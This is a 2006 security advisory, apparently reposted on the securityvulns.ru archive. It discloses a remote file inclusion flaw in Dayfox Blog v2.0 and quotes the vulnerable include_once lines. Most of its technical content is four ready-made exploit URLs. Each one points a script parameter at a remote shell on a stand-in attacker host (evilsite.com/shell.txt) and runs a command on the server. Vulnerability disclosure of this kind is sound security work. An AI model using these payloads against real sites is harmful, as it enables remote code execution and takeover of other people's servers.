Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BBaCE <= 3.5 (includes/functio
ns.php) Remote File Include Vulnerability

  digishop v 4.0.0 Xss Vuln.

  Pebble 2.0.0 RC[1,2] XSS vulnerability

From:Dj_ReMix_20_(at)_hotmail.com <Dj_ReMix_20_(at)_hotmail.com>
Date:03.10.2006
Subject:Dayfox Blog v2.0 Remote file include

# BiyoSecurity.Org

# script name : Dayfox Blog v2.0

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable files :

adminlog.php
postblog.php
index.php
index2.php

# Vulnerable code :

include_once ($slogin_path . "/slogin_lib.inc.php");
include_once ($slogin_path . "/header.inc.php");


Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server